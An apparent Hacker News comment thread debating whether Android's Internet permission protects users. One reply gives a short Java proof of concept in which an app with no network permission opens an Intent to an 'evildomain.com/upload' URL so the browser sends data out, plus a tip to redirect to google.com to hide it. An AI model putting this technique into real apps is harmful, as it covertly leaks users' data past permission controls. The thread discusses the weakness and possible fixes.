← Back to context

Comment by 87636899376

21 days ago

> 1) Internet connection is so ubiquitous as to just be noise if displayed

That doesn't make it any less useful.

> 2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar

I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it. But even if it is flawed, don't you think Google would be a bit more incentivized to make the Internet permission work as expected if people could disable it?

12 comments

87636899376

Reply
UncleMeat  21 days ago

> I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it.

   Uri uri = Uri.parse("https://evildomain.com/upload?data=DATA_GOES_HERE);
   Intent i = new Intent(Intent.ACTION_VIEW, uri);
   startActivity(i);

Happily uses the browser app to do the data send for you. Requiring apps to have all the permissions of the recipient of an Intent before being allowed to send it would be a catastrophic change to the ecosystem.

  • broker354690  21 days ago

    > would be a catastrophic change to the ecosystem.

    Hey we were already on board with this, you don't have to convince us.

    • UncleMeat  21 days ago

      The effect of this would be to make all apps request all permissions because even if you are just using some other app for a particular feature you need, you have no control over what other permissions they might add which would suddenly break any intents you send them. The only defense would be to request everything.

      You could very specifically ban ACTION_VIEW intents for web URIs from apps without an internet permission I guess. But does banning apps from linking to the web (to be opened in browsers) really seem like a good idea?

      1 reply →

  • noname120  21 days ago

    I don’t see why you couldn’t disallow opening URL intents. App intents that enable to exfiltrate data should be cracked down on by Google, it’s basically a privilege escalation.

    • UncleMeat  20 days ago

      "No links to web uris allowed" would be a pretty intense restriction. Now the free calculator can't even link to the paid version on the app store. There's already precious few apps that don't really need internet access (usually simple tools apps that don't have ads) and this even further limits that set.

  • sterlind  21 days ago

    so? pop up a permission prompt. have the user confirm.

    and isn't it immediately apparent that the app is leaking data if your calculator is popping a webview?

    • UncleMeat  21 days ago

      "Pop up a permission prompt every single time an app links out to a browser" is not going to be a thing that users like.

      Yes, this is a little suspicious. But you just have the evil page redirect to google.com or something benign. To the user it looks like "huh, chrome just opened on its own."

      3 replies →